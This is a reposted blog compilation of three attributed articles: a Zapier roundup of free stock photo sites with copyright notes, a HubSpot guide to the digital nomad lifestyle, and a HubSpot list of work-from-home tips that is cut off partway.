Category: Android

The 9 best free stock photo sites in 2022

How to find free stock images for business and commercial use

Stock photo sites are a dime a dozen, so it can be tough to know where to find free, high-quality images that aren’t also on every other website.

And as a freelancer and a business owner, I’ve done my fair share of scouring the web for that perfect stock photo. So I spent several weeks reviewing dozens of stock photo websites—and I narrowed it down to the nine best for your next project. 

The 9 best free stock photo sites

  • Unsplash for the widest variety of free stock images (and integrations)
  • Pixabay for a variety of media types
  • Gratisography for quirky images you won’t see anywhere else
  • Canva for adding simple enhancements and overlays
  • Burst for eCommerce companies
  • New Old Stock for vintage photos
  • Reshot for UX/UI designers
  • 123RF for photo sizes optimized for social media
  • Flickr for interacting with the photography community

How to find the best websites with 100% free stock photos

How we evaluate and test apps

All of our best apps roundups are written by humans who’ve spent much of their careers using, testing, and writing about software. We spend dozens of hours researching and testing apps, using each app as it’s intended to be used and evaluating it against the criteria we set for the category. We’re never paid for placement in our articles from any app or for links to any site—we value the trust readers put in us to offer authentic evaluations of the categories and apps we review. For more details on our process, read the full rundown of how we select apps to feature on the Zapier blog.

Finding images that are free for commercial use isn’t as hard as it might sound, thanks to a number of sites that aggregate photos, illustrations, vectors, and more. These sites usually let you search and filter by keyword or category, making it easy to find what you’re looking for. But that doesn’t mean every stock photo site is worth perusing.

The best free stock image sites all meet the following criteria:

5 things you should automate today

Start automating

  • They must contain images that can be used without payment for both commercial and personal purposes.
  • I focused on sites that have at least 500 photos, but I favored ones that offer thousands of images.
  • A lot of free stock photo sites essentially offer the same pictures. I looked for sites that offered unique images, so your content can stand out.
  • If you plan to use stock photos for your website or branded content, you’ll need high-quality resolutions. Every site on this list offers at least one high-quality download size for its photos.
  • And of course, the website itself should be fast, easy to navigate, and from this century.

When reviewing these sites, I visited each one and signed up for an account if necessary. I explored the site’s menus and conducted a number of searches to see what types of photos would come up. I reviewed the quality of the photos and took note of things like how advanced the search filters were, whether there were high-resolution download sizes available, and if there was anything uniquely useful about the stock photo site in question.

Best free stock photos site for a variety of photos and integrations  

Unsplash (Web, iOS, Android)

Unsplash, our pick for the best free stock photos site for a variety of photos and integrations

With more than three million photos and multiple plugins, Unsplash is one of the most easily accessible and largest collections of stock photos available. 

It comes with native apps like an iOS app, an Android photo picker, Apple TV and desktop wallpaper apps, and even a Chrome extension that randomly selects a background image when you open your browser. Unsplash’s API is also already natively integrated into popular tools like Figma, Notion, Trello, and Squarespace, letting you search and use high-quality stock photos without leaving your favorite platform. 

The site is also easy to use: type a keyword into the search bar at the top of the page, and browse the results to find the best images for your purposes. And if you don’t know what you’re looking for, there are category tabs along the top of the homepage for inspiration.

Another feature that sets Unsplash apart from other free photo sites is its Collections section. Users of the site are able to create Collections—like “Christmas Traditions,” “Autumn,” and “Milkyway“—by curating photos they come across. If you want several similar photos of a specific theme, Unsplash may be your best option.

Best free stock photos site for a variety of media types

Pixabay (Web, iOS, Android) 

Pixabay, our pick for the best free stock photos site for a variety of media types

Pixabay hosts more than 2.6 million photos, illustrations, vector graphics, and videos—all of which are free to use. Click Images next to the search bar to look for images by type, or you can search more granularly by becoming familiar with Pixabay’s advanced search options. Pixabay lets you search by photographer, orientation (i.e., landscape or portrait), size, and even color. The site also features an Editor’s Choice curation section, which highlights the best images chosen by the Pixabay team. Click the Explore dropdown menu in the upper-right corner of the site to see their selections.

If you need a professional-looking illustration—i.e., a hand-drawn image or a computer-generated graphic—you should begin your search here. Royalty-free illustrations can be tricky to find on many free image sites, but Pixabay has loads of them. Just click Images, select Illustrations, enter in your search terms, and that’s that. You can also use Pixabay to search for vector graphics, videos, music, and even sound effects.

Best free stock photos site for quirky images you won’t see anywhere else

Gratisography (Web, Android)

Gratisography, our pick for the best free stock photos site for quirky images you won't see anywhere else

Gratisography doesn’t have thousands of pictures for you to browse through. What it does have is some of the quirkiest images you will find on the web—images you won’t be able to find anywhere else, like a young kid spray painting and an alarm clock that looks like it’s on the moon.

The site is pretty barebones—and its color scheme is distracting at best, with bright neon colors and cartoonish UI elements. Photos are organized into only nine different categories: Animals, Business, Fashion, Food, Nature, Objects, People, Urban, and Whimsical. And while the photo resolutions are high-quality, they only come in one size (and you have to download each photo to find out). 

But if you’re looking for an odd image that will bring your content to life, Gratisography is definitely the place to start.

Best free stock photos site for adding simple enhancements and overlays

Canva (Web, macOS, Windows, iOS, Android) 

Canva, our pick for the best free stock photos site for adding simple enhancements and overlays

Canva is a web-based graphic design tool that makes modifying images easy. If you’re looking for stock photos for a graphic design project—like designing a social media banner or a flyer—Canva is a one-stop shop for your needs. Even with a free account, the platform offers a library of over 1.6 million free images you can use for any purpose.

If you’re planning on enhancing the images you find with simple text overlays or tweaking the transparency or vibrancy of photos on a regular basis, Canva will help you streamline the process. Find photos, and then use Canva’s built-in design tool to enhance them on the spot.

One helpful feature is that Canva automatically generates a color palette for any photo you choose. If you’re building a vision board or a design presentation, you can easily use the hex color codes to keep your project’s color scheme consistent.

Canva does come with a few downsides, though. As I was testing, I noticed that you can’t directly download a stock photo as you would from another stock photo site. Instead, you’ll have to click Use in a design. Canva takes you to the design dashboard with the stock photo on your digital canvas. While this is helpful if you intend to add text or graphics to the image, it’s an unnecessary complication if you plan to download a stock photo as-is.  

Also, many of the best stock photo sites let you choose the size of your photo before downloading it. Canva only provides one size—though the photos are all in high resolution.

If you’re looking for more stock photo sites for graphic design, PikWizard and Kaboompics are both great Canva alternatives. PikWizard is linked to DesignWizard, a design tool similar to Canva. And Kaboompics focuses on color palettes; you can even download your chosen photo along with with the color scheme it uses, which is useful for putting together vision boards and presentations. Kaboompics also lets you choose a custom pixel width when downloading an image, which is a helpful feature.

Best free stock photos site for eCommerce businesses

Burst (Web, iOS, Android) 

Burst, our pick for the best free stock photos site for eCommerce companies

Burst is a free stock photo site powered by leading eCommerce platform Shopify. The platform offers thousands of free images you can use to strengthen your content, including a large selection of business-oriented photos (e.g., retail, eCommerce, money, and products). The site serves up 28 different categories, several of which are broken down into subcategories to make it even easier to find the images you need.

Browsing, searching, and downloading are standard fare, but as an added bonus, Burst and Shopify offer advice on things like how to turn your online business ideas into reality.

Best free stock photos site for vintage photos

New Old Stock (Web) 

New Old Stock, our pick for the best free stock photos site for vintage photos

New Old Stock publishes vintage photos from the public archives. If you think old photos—like a group of men sitting outside a storefront in the late 1800s or a British dispatch rider in France—would match your brand, spend a few minutes scrolling through New Old Stock to see if anything catches your eye.

Unfortunately, the site doesn’t have as much variety as other stock photo sites—and not all of the photos are free for commercial use. The site creator advises commercial users to check with the originating institution’s rights statement through the provided link to the original Flickr posting of each photo.

The site’s search functionality also leaves much to be desired. And unlike most free image sites, New Old Stock doesn’t offer any way to filter photos. If you’re feeling lucky, though, click the magnifying glass in the upper-left corner of the site, type in a search phrase, and you may strike (vintage) gold.

Best free stock photos site for UX/UI designers

Reshot (Web)

Reshot, our pick for the best free stock photos site for UX/UI designers

Reshot is a relatively new resource for designers, whether they need stock photos, vector illustrations, or icons. The site’s collection is provided by the design team over at Envato Elements, a paid creative subscription service for templates, photos, music, and more. But Reshot provides free visual resources for designers on a budget.

Unlike many other stock photo sites, Reshot has a wide variety of vector illustrations and icons as well. The site boasts millions of images that are free for personal and commercial use. The website is minimalist in design, with a left-hand menu where you can choose to browse collections of icons, illustrations, or photos. Or if you know what you’re looking for, type your search terms into the search bar and narrow the results by media type and orientation. 

If you find an illustration you like, you have the option to download a vector or PNG—while icons come in SVG code or SVG. And since you’ll likely want to make additions or changes to these images, Reshot makes it easy to download files straight into Figma. 

One downside I noticed as I was testing is that while illustrations and icons have multiple download types, it appears that photos can only be downloaded as JPEGs—and only in one size. Those sizes are in high-quality resolution, but you can’t choose from a variety of sizes. But in general, if you’re looking for ideas or raw images for your wireframes or prototypes, Reshot is a great option. 

Best free stock photos site for optimizing images for social media

123RF (Web, iOS, Android)

123RF, our pick for the best free stock photo site for photo sizes optimized for social media

If you’re looking for free stock photos for Instagram or other social media sites, 123RF makes your search easy. The stock photo site not only provides a variety of free photos and vector illustrations, but it also lets you choose from a selection of download sizes, including Facebook cover, email header, Pinterest post, and even brochure cover. 

These pre-selected sizes can save you hours of cumulative time spent cropping and resizing images for social media. You can even apply a filter, add text, and remove the image’s background directly from the site before downloading it.

As I was testing, I did notice that you can’t reposition an image after choosing a social media-optimized size. So if you choose an image whose focal point isn’t the center, you may run into issues if you pair it with a small or narrow aspect ratio. 

Overall, the site is clean and easy to navigate. And if you’re willing to pay a few dollars per image, 123RF provides a wider variety of images as well as a variety of stock footage and audio for use in your next project.

Best free stock photos site for interacting with the photography community 

Flickr (Web, iOS, Android)

Flickr, our pick for the best free stock photos site for interacting with the photography community

Flickr is a photo sharing social network. The site—which boasts more than five billion images—brings together professional and amateur photographers from around the world.

The thing I appreciate about Flickr is that it places artists front and center. When you navigate to Flickr’s homepage, you’ll immediately see a gallery of suggested people to follow. Click into any one of their profiles to see a “Photostream,” or a feed of their latest and most popular images. Flickr is a great way to discover talented photographers, learn more about the field, and refine your own artistic eye.

The photos on Flickr are known for containing rich metadata, including geolocation information, EXIF data, tags, and more. So if you want to find photos taken in France, select the World Map under the Explore dropdown, and click on one of the pink dots that pop up in that country. If you want to find images of golden retrievers, simply type the term into the search bar in the upper-right corner of the Flickr homepage, and thousands of results will come back. Plus, Flickr lets you search by trending photos and most recently added photos. You can even explore galleries and search specific photographers’ collections by clicking on their usernames.

And if you’re a budding photographer yourself, you can even click Camera Finder under the Explore dropdown to see the most popular cameras currently being used in the Flickr community.

Keep in mind that you can’t use every photo you find on Flickr for free—especially for commercial use. But it’s easy to figure out which ones are usable. Run a search for an image, and then click the Any license dropdown menu and select Commercial use allowed.

If you get sick of seeing ads as you browse Flickr, you can upgrade to an ad-free experience for $5.54/month. The premium subscription also comes with unlimited storage (free users get one terabyte of storage). And if you want to even more with your stock photos, connect Flickr to Zapier to do things like share new Flickr photos on social media or back up new Flickr photos to Google Drive.

Share new Flickr photos on Twitter, Facebook, and Pinterest

Try it

  • Facebook Pages logo
  • +2
  • Twitter logo

Facebook Pages, Flickr, Pinterest, Twitter

Facebook Pages + Flickr + Pinterest + 1 moreMore details

Back up new Flickr photos to Google Drive

Try it

  • Flickr logo
  • Google Drive logo

Flickr, Google Drive

Flickr + Google DriveMore details

If you’re looking for more sites that prioritize the photography community, Pexels is a great Flickr alternative. Pexels offers hundreds of thousands of photos that are free for both commercial and personal use. The site has a leaderboard and a number of photography contests for contributors, which makes it a great site for finding photographers who are engaged with the platform and constantly uploading fresh content. 

Other stock photo sites to consider

If you’re looking for something a little more unique (and you have the budget for it), you could try a paid option like ShutterstockiStock by Getty, or Adobe Stock. These sites are all very well-established resources for paid—but relatively affordable—stock photos. You can subscribe to any of these sites for $29 per month for up to ten monthly image downloads.  

There are also many niche stock photography sites out there (like Foodiesfeed, which specializes in food photography). So if you’re looking for a specific type of image, it’s worth seeing if there’s a niche site available. These sites might give you a wider range of options in the specific category you’re looking for.

If you’re publishing content on a regular basis, you’ll likely get the best results by using a combination of our recommended sites. Just be sure that you keep your branding consistent: using too many eclectic images can muddy your brand and make it hard to stand out from the crowd.

A note on copyrights

Why can’t you just scour the web for an image you like and publish it? Because creators own the rights to their images, and if you publish one of them without their approval, you may be guilty of copyright infringement. In a worst-case scenario, that could land you a $150,000 fine for each violation, and possibly even jail time. Of course, you’ll receive a cease-and-desist letter first, telling you to take the images down, but even still, you’ll waste time and effort removing them—in addition to the time and effort you wasted finding them in the first place.

But some creators are happy to share their images with others. Creative Commons offers a number of different licenses that creators can use to enable other people to leverage their work freely. Of course, it’s not all or nothing: some licenses allow for personal use, while others allow for commercial use. Some licenses require you to attribute images to creators, while others don’t. Some allow you to adapt or modify an image, while others require you to use it in its original form. When using an image licensed through Creative Commons, be sure to read the fine print and abide by the terms.

Source :
https://zapier.com/blog/best-free-stock-photos/

What Is a Digital Nomad and How Do You Become One?

In the Cascade Mountains of Southern Oregon, there sits a volcano with no peak. But what takes the place of a billowing summit isn’t a barren crater — it’s an electric blue lake, surrounded by pine trees and the jagged remains of the volcano’s collapsed mouth, which crumbled during an eruption almost 8,000 years ago.

This place is called Crater Lake. It’s considered one of the most beautiful national parks in the United States. It’s also where Justin Champion, a Content Professor at HubSpot Academy, spent his work day last Thursday.https://www.instagram.com/p/BkTxa6cHCjr/embed/captioned/?cr=1&v=8&wp=648&rd=https%3A%2F%2Fblog.hubspot.com&rp=%2Fmarketing%2Fdigital-nomad#%7B%22ci%22%3A0%2C%22os%22%3A1813.1999999999534%2C%22ls%22%3A1638.5%2C%22le%22%3A1770.9000000001397%7D

A striking landscape, like Crater Lake, is a normal office view for Justin and his wife, Ariele. After working in the National Park, they headed north to Portland and spent a day in Mt. Hood. Then, they drove through Redwood National Park. And next week, they plan to work in Yosemite National Park.

Justin and his wife have been living, working, and traveling across America in a Ford F-250 with an Airstream trailer hitched to its back for the past two years. And their alternative lifestyle has helped them prioritize life experiences and close connections over material possessions. They’re modern day nomads. Or what most people call digital nomads.

What is a Digital Nomad?

Digital nomads are remote workers who usually travel to different locations. They often work in coffee shops, co-working spaces, or public libraries, relying on devices with wireless internet capabilities like smart phones and mobile hotspots to do their work wherever they want.

With 34% of remote employees working 4-5 days a week out of the office, the digital nomad lifestyle could be an exciting possibility if you’ve caught the travel bug and want to break free from the shackles of 9-5 life. Below, we’ll cover the benefits, job opportunities, and realities of this alternative lifestyle.

Let’s find out if it’s the right fit for you.

Living the Dream? 5 Benefits of Being a Digital Nomad

1. You’ll be more productive.

There’s no time to waste when you travel to gorgeous places almost every day. Exploring your new surroundings will motivate you to get your work done as soon as possible. Adventure can be one of the best types of motivation.

2. You’ll have more breakthrough ideas.

Creativity happens when you mash seemingly unrelated concepts together to form a new idea. Neuroscientists call this synaptic play, and the more incongruent the concepts are, the more synapses occur in your brain. Working in a different place everyday gives you a lot of diverse experiences that you call pull from to make these creative connections. And when your brain is chock full of these diverse inputs, your ideas are much more inventive.

3. You’ll become more adaptable.

Constantly traveling to new places pushes you out of your comfort zone. And to adapt to new environments everyday, you need to be willing to engage with different people and cultures. This makes you more open to new experiences in the future.

Traveling also improves your brain’s reaction to change. When you travel, the stress of navigating a foreign place sprouts dendrites in your brain. These dangling extensions increase your brain’s capacity and attentiveness during new and challenging situations in the future.

In a nutshell, traveling strengthens your desire and ability to learn new skills.

4. You’ll have more time to do the things you love.

Even though work can be great, we still work to live, not the other way around. Finishing work faster gives you more time in your schedule to explore your surroundings, do the things you’re passionate about, and spend more time with loved ones.

5. You’ll make lifelong friendships.

Adventure and memorable experiences forge close connections between people. When you embark on your journey, you’ll meet other digital nomads and become friends with them. And if you travel with a friend or significant other, your relationship will be closer than ever before.

Common Jobs for Digital Nomads

Today, most companies embrace remote work. 43% of American employees spent time working remote last year, and this number will only increase. But being a digital nomad and working a few days at home are two different animals. If you want to keep your day job while traveling, you need to prove to your manager that you can handle full-time remote work before you can do work on the road. Justin Champion decided to work remotely for six months before he even asked to travel.

If you’re looking for job, sift through sites that only list remote jobs, like We Work Remotely or Remote.co, and ask prospective employers if the role lends itself to your nomadic lifestyle.

Freelancing is also a common role for digital nomads. Before you embark on your journey, though, you must be realistic with yourself. How will you be able to make a living? Answer the following questions to help you figure this out:

  • What am I good at?
  • What do I like to do?
  • Is there a need for my skill?
  • Can I do this job online?

Once you know how you’ll be able to make money, you can enter the gig economy by marketing and selling your services on your own, or finding work on a freelance service marketplace like Upwork or Fiverr.

Whether you chose to work for a company or yourself, becoming a digital nomad doesn’t mean pigeonholing yourself in a specific role. Your job just has to be fully digital. Listed below are some common roles that lend themselves well to a fully remote lifestyle:

  • Accounting
  • Customer Service
  • Design
  • Editing
  • Healthcare
  • IT
  • Marketing
  • Project Management
  • Quality Analyst (QA)
  • Recruiting & HR
  • Sales
  • Software Development
  • Teacher/Tutor
  • Transcription
  • Virtual Assistant
  • Writing

As you can see, there’s a lot of different industries and roles for digital nomads. Remote work is becoming commonplace, which is exciting and beneficial for the workforce. But that doesn’t mean anyone and everyone should be a digital nomad. It’s still a tough challenge. You need to be organized and disciplined, or you won’t be able to enjoy your travels — which is the point of the lifestyle, right? So how do you set yourself up for success?

How Do You Become a Digital Nomad? 5 Things to Consider Before You Get Started

1. Get rid of unnecessary expenses.

Paying for things that don’t greatly impact your life is never ideal. That’s why you need to get rid of all the expenses that you won’t need living as a digital nomad. Things like gym memberships, subscriptions, and debt are all expenses that’ll bog you down on the road. And if you’re a freelancer, they’ll be even more of a burden because you might experience some periods of inconsistent income. Getting rid of these expenses and paying off debt will allow you to fully focus on your work and travels.

2. Make sure you have income you can rely on for months in advance.

Whatever lifestyle you pursue, it’s always smart to have safety net. You never know when an emergency will arise. This rings especially true when you’re a digital nomad because you’re mostly own your own. You can’t find solace in a warm, comfortable home or family, and if you’re freelancer, you don’t have the luxury of a consistent paycheck. To widen your safety net, you should sell any unnecessary belongings, move the essentials into a storage unit, sell or rent your house, and save as much money as possible.

3. Get travel health insurance.

Traveling can give you some of the best experiences in your life, but it not always a blissful, perpetual highlight reel. It’s still real life. You’ll get sick, have emergencies and accidents, and need regular checkups. You also need immunizations to enter certain parts of the world. Your health should be your number one priority during your travels, so make sure you buy a solid health insurance plan that’s valid in all the places you visit.

4. Set yourself up for financial success.

Ample funds are the key to successful travel. American credit cards will usually charge you a fee if you use it abroad, so ask your bank for an international credit card. You should also sign up for credit monitoring services that’ll alert you if anyone tries to steal your identity.

5. If you travel internationally, unlock your phone.

Most countries have different cell phone carriers, so if you want to bounce from country to country, you need to call your current carrier and ask them to unlock your phone. You’ll be able to use your phone in any country because you can put a different sim card in your phone from each international carrier you use.

Once you square these things away, it’s time to start your new life on the road. But actually living life as a digital nomad is an entirely different ballgame than preparing to be one.

7 Tips for Living as a Digital Nomad

1. Make a budget.

As a digital nomad, your budget should be your bible. And if you follow it, you can live quite comfortably. To create a successful budget, calculate your living expenditures, the cost of traveling to each destination, staying there, the activities you’ll do there, the costs of working, and how it all affects your savings if you can’t earn a salary for a while.

2. Plan for the worst-scenario.

When you live abroad, It’s crucial to have multiple backup plans in case of any emergencies. Nothing really ever works out the way it’s supposed to. Things happen. What if your truck breaks down? Or what if you get stuck in a foreign country with no backup plan? What’s your plan B and C? You need to set these processes in place to handle the inevitable bumps in the road.

3. Join a digital nomad community.

Digital Nomad communities like Couchsurfing and Nomadlist will help you learn the nuances of the digital nomad lifestyle, and reduce its steep learning curve. Fellow nomads will be happy to answer any pressing questions about your new lifestyle and any areas you plan to visit. They’ll also teach you how to work effectively on the road. And arguably the most beneficial perk of these communities is that you can connect with other traveling professionals, which can lead to new business opportunities, partnerships, and friendships.

4. Make sure you have cell reception or wifi.

If your employer lets you work remotely, show them and your team some respect by being available as much as possible online. Not having wifi or cell phone reception should never be an excuse for missing a meeting or failing to get an assignment done. The same goes for client work, if you’re a freelancer.

To make sure you’ll always have internet connection, consider investing in a cell phone booster and a mobile hotspot mifi device. Cell phone boosters can detect the smallest shred of cell phone reception and send the signal to your vehicle. Mobile hotspot mifi devices strengthen your mobile hotspot service, so you don’t have to rely on a spotty, public wifi connection.

5. Make sure you can communicate with locals.

Knowing the language of the country you’re going to or knowing that they speak your language is crucial for successful travel. Assuming that there has to be someone who will understand English is a dangerous move. But if you must go to a place where you don’t know the native language or they don’t speak yours, use Google Translate or another translation app to navigate your new environment.

6. Research your destinations.

If you’re not living in an RV, find affordable housing on AirBnB or Couchsurf before you arrive to your destination. And make sure your lodging is near a hospital, emergency room or clinic in case of an emergency. You should also research the area to find safe neighborhood to stay in.

7. Draw cash from ATMs.

Airports are notorious for charging ridiculously high currency exchange fees. If you need cash, draw it from an ATM. Your bank will charge you a fee, but it’ll be much lower than the one at the currency exchange desk.

Before you set off …

If an adventurous lifestyle sounds appealing to you, then being a digital nomad can be one of the most rewarding yet challenging ways to live. But if you arm yourself with organization, discipline, and a thirst for learning, you could enjoy an exciting and fulfilling life on the road. Just ask Justin and Ariele Champion. They’re living the alternative American Dream. And they’ve never looked back.

Source :
https://blog.hubspot.com/marketing/digital-nomad

How to Work From Home: 24 Tips From People Who Do It Successfully

Working from home is awesome, right up until the cat throws up on your computer. And your neighbor, who you can only assume is building a time machine, starts firing up all sorts of power tools and noisy machinery across the street.

COVID-19 has caused remote work to become a necessity instead of a luxury for many professionals. But which environment allows us to be more productive: the home office or the office office?

In the office office, your colleagues often pose the greatest threat to keeping you from getting some real, heads-down work done. They drop by your desk, engage you in conversation, and invite you to lunch — or so I hear. The social benefits are nice to have, but they can become a challenge if you’re easily distracted.

However, at the home office, while family members can be a distraction, I find that it’s easy for you to become your own worst enemy. Because without coworkers around, you’re free to drop those pesky inhibitions. At the home office, no one’s watching. You don’t necessarily feel that same peer pressure or communal obligation to get stuff done. (Also, you don’t have to wear pants.)

Download Now: How to Be More Productive at Work [Free Guide + Templates]

Below, I’ve compiled many great work-at-home tips and tricks from some of my awesome coworkers.

Stop Managing Your Remote Workers As If They Work Onsite

How to Work From Home

  1. Communicate expectation with anyone who will be home with you.
  2. Take clear breaks.
  3. Interact with other humans.
  4. Prepare meals the night before.
  5. Pick a definitive finish time.
  6. Eat and sleep.
  7. Talk to your employer.
  8. Join a remote-friendly company.
  9. Start a career as a freelancer.
  10. Start a home business.

1. Communicate expectations with anyone who will be home with you.

Of course, you might be working from home but still have “company.” Make sure any roommates, family members, and dogs (well, maybe not dogs) respect your space during work hours. Just because you’re working from home doesn’t mean you’re home.

If you share space with another work-from-home adult, you may have to lay ground rules about meeting times, shared desks and chairs, and quiet times.

CEO Sam Mallikarjunan tells how he manages to get work done even when people are around.

“If anyone else is going to be at home when you’re working, they just have to be clear that when you’re in your ‘office’ (in my case, my signal to the family is having headphones on), you’re working — even if it looks like and feels like you’re hanging out at home.”

He continues, “It’s easy to get distracted by the many things that have to be done around the house during the day.”

2. Take clear breaks.

It can be so easy to get distracted as a telecommuter that you avoid breaks altogether. Don’t let the guilt of working in the building you sleep in prevent you from taking five minutes to relax.

However rather than just opening YouTube and watching some comfort clips, use your breaks to get away from your desk. Go for a walk, enjoy fresh air, or spend time with others who might also be in the house.

Take Ginny Mineo‘s advice. “Breaks, like making and eating lunch, can recharge you to do better work. Don’t assume you need to be working 100% of the time while you’re home to be more productive.”

3. Interact with other humans.

When your office starts working from home, you’ll likely miss the casual social interactions with colleagues you’re used to throughout the day. When working from home, you don’t have the small talk and other activities that make each day at the office unique.

So what can you do? Communicate.

Fight boredom and loneliness by frequent communication with other employees. Reach out to them through video chat via apps like Zoom and Slack, a hosted phone system,  or however else your company communicates.

Remember: You’re working from home, not the moon. Interacting with other people during the day is allowed, even if they’re not your colleagues. It’s a good idea to see another face during the day when most of your workday is solitary. So, use your breaks to interact with others.

“Go outside and find a human to interact with — ordering your coffee, running an errand, whatever. It keeps you sane.”

– Corey Wainwright

4. Prepare meals the night before.

When you’re in your own home, it can be tempting to spend time preparing a nice breakfast and lunch for yourself, chopping and cooking included. Don’t use precious minutes making your food the day of work — cook it the night before.

Preparing food ahead of time ensures you can use your meal times to eat and that you aren’t performing non-work tasks that spend energy better used at your desk.

Digital marketing strategist, Lindsay Kolowich, adds, “Cooking at home is time you wouldn’t have spent meal prepping if you’d been in the office that day, and I find the minutes can add up in the end. To mitigate that, I try to cook and prep my meals the night before, just like I would for a day at the office.

5. Pick a definitive finishing time.

You might be under the impression that working from home establishes more work-life balance, but be careful with that assumption.

Working from home can also feel like being at a casino — you can get so caught up in your activity, in a relaxing environment, that you lose complete track of time.

“If you work from home full-time (or regularly), it’s really easy to let your work life bleed into your personal life,” says Tyler Littwin.

He continues, “Maintaining a boundary is important for both halves of the equation.”

In lieu of coworkers, whose packing up and leaving the office reminds you to do the same, set an alarm at the end of the day to indicate your normal workday is coming to an end. You don’t have to stop at exactly that time, but knowing the workday is technically over can help you start the process of saving your work and calling it quits for the evening.

6. Eat and sleep.

What is the biggest perk to working from home? One of the biggest benefits for some people (me), is complete access to the kitchen.

As soon as I take a break, I automatically drift towards the kitchen for some snacks.

An unhealthy diet can affect productivity and drain energy. When I switched to a healthier diet, it made me function better and get the most from my routine.

So eat well when working from home.

It’s also vital that you keep to a proper sleep schedule. Save binge-watching your favorite shows for the weekend. With the right food to keep energy levels high and sound sleep to refresh your body and mind, you can make a success of working from home.

7. Talk to your employer.

If you like your current job and don’t want to change it, the obvious step is to find a way to pivot the position.

One of the tips for doing this is folding the possibility of going remote into your next promotion cycle. Talk to your boss often about your intention to pivot.

And, if you’re not sure your employer will agree to working completely remotely, talk about the option of working remotely one or two days a week. When you use the work from home tips we’ve provided above, and your boss sees how productive you are, they could allow you more days to work from home.

8. Join a remote-friendly company.

If your work can be done remotely, but your current boss or organization doesn’t allow you to work from home, you might need to get a new job.

When looking for a work-from-home job, you can use the same methods you used in finding your regular office job. This includes channels like job sites, local job ads, and social media platforms.

Job sites that list work from home ads include:

Some remote-friendly firms include:

Check out these firms to see whether you meet the requirements to start working remotely for them.

9. Start a career as a freelancer.

If your current job isn’t remote work-friendly, you can go remote by starting your own business as a freelancer or a consultant.

Depending on the nature of your current job, you may start your own freelance business while still being employed.

The benefit of starting your freelance business while still employed is that it reduces the financial strain experienced by any new business.

10. Start a home business.

Starting a home business is one way to enjoy remote work.

Unlike other fields, certifications and education are not usually prerequisites. Instead, researching, having a smart business plan, and choosing the right business is more essential to the success of your business.

You can find more work-from-home tips in the books listed in this best remote work books article.

Working From Home Tips

  1. Get started early.
  2. Pretend like you are going into the office.
  3. Structure your day like you would in the office.
  4. Choose a dedicated workspace
  5. Don’t stay at home.
  6. Make it harder to use social media.
  7. Commit to doing more.
  8. Work when you’re at your most productive.
  9. Save calls for the afternoon.
  10. Focus on one distraction.
  11. Plan out what you’ll be workign on ahead of time.
  12. Use technology to stay connected.
  13. Match your music to the task at hand.
  14. Use laundry as a work timer.

1. Get started early.

When working in an office, your morning commute can help you wake up and feel ready to work by the time you get to your desk. At home, however, the transition from your pillow to your computer can be much more jarring.

Believe it or not, one way to work from home productively is to dive into your to-do list as soon as you wake up. Simply getting a project started first thing in the morning can be the key to making progress on it gradually throughout the day. Otherwise, you’ll prolong breakfast and let the morning sluggishness wear away your motivation.

Lindsay Kolowich says, “When I work from home, I wake up, put on a pot of coffee, and start working immediately — much earlier than normal working hours. I only start making breakfast once I’ve hit a wall or need a break. I’m a morning person and find I can get a ton done in the early morning hours, so this works really well for me.”

2. Pretend like you are going into the office.

The mental association you make between work and an office can make you more productive, and there’s no reason that feeling should be lost when working remotely.

I know that you love working in your pajamas (I do, too), but the mere act of changing clothes to something more serious will give you a signal to get work done throughout the day.

When you dress up, you give your brain a reason for dressing up, and it can keep you pumped throughout your work hours.

So when working from home, do all the things you’d do to prepare for an office role: Set your alarm, make (or get) coffee, and wear nice clothes.

Internet browsers like Google Chrome even allow you to set up multiple accounts with different toolbars on the top — for example, a toolbar for home and a separate toolbar for work.

Take to heart the words of HubSpot graphic designer, Anna Faber-Hammond, who says, “Get fully ready for the day and pretend you’re actually going to work. Otherwise, you might find yourself back in bed.”

3. Structure your day like you would in the office.

When working from home, you’re your own personal manager and can choose your working hours.

However, without things like an in-person meeting schedule to break up your day, you can easily lose focus or burn out.

To stay on schedule, segment what you’ll do and when for the day. If you have an online calendar, create personal events and reminders that tell you when to shift gears and start on new tasks. Google Calendar makes this easy.

Structuring your day as you would in the office also saves you from work creep. With this structure in place, working from home will not cause your work to invade your personal life.

“Are mornings for writing while you’re in the office? Use the same schedule at home. This structure will help keep you focused and productive.” – Ginny Mineo

4. Choose a dedicated workspace.

Just because you’re not working at an office doesn’t mean you can’t, well, have an office. Rather than cooping yourself up in your room or on the couch in the living room — spaces associated with leisure time — dedicate a specific room or surface in your home to working remotely.

No matter the space or location, have an area of the home to work and stay committed to throughout the day. And, after choosing your dedicated workspace, make the most of it by making it quiet.

CEO, Sam Mallikarjunan says, “Have a place you go specifically to work. It could be a certain table, chair, local coffee shop — some place that’s consistently your ‘workspace.’ It helps you get into the right frame of mind.”

5. Don’t stay at home.

Is your home office just not getting it done for you? Take your work-from-home life a step further and get out of the house. Coffee shops, libraries, public lounges, and similar Wi-Fi-enabled spaces can help you simulate the energy of an office so you can stay productive even when you don’t sit in an official workplace.

Content marketer, Corey Wainwright, comments, “I get out of my home to work and go to an establishment with actual tables, chairs, and people. It helps simulate the work environment and removes the distractions I typically have at home, like the urge to finally clean my room, do laundry, or watch TV. “

6. Make it harder to use social media.

Social media is designed to make it easy for us to open and browse quickly. As remote workers, though, this convenience can be the detriment of our productivity.

To counteract your social networks’ ease of use during work hours, remove them from your browser shortcuts and log out of every account on your phone or computer.

You might even consider working primarily in a private (or, if you’re using Chrome, an “Incognito”) browser window. This ensures you stay signed out of all your accounts, and each web search doesn’t autocomplete the word you’re typing. It’s a guarantee that you won’t be tempted into taking too many social breaks during the day.

Also, many have found it helpful to shut off social media notifications during the hours they work from home.

Alec Biedrzycki, product marketer at AirTable, says, “I remove all social networks from my toolbar bookmarks… you can get sucked in without knowing it, so eliminating the gateway to those networks keeps me on track.”

7. Commit to doing more.

Projects always take longer than you initially think they will. For that reason, you’ll frequently get done less than you set out to do.

So, just as you’re encouraged to overestimate how much work hours you’ll spend doing one thing, you should also overestimate how many things you’ll do during the day.

Even if you come up short of your goal, you’ll still come out of that day with a solid list of tasks filed under ‘complete.’

“On days I’m working from home, I tend to slightly overcommit on what I’ll deliver that day. So even if I get the urge to go do something else, I know I’ve already committed a certain amount of work to my team.”- Corey Wainwright

8. Work when you’re at your most productive.

Nobody sprints through their work from morning to evening — your motivation will naturally ebb and flow throughout the day. However, when you’re working from home, it’s all the more important to know when those ebbs and flows will take place and plan your schedule around it.

To capitalize on your most productive periods, save your more challenging tasks for when you know you’ll be in the right headspace for them. Use slower points of the day to knock out the easier logistical tasks on your plate.

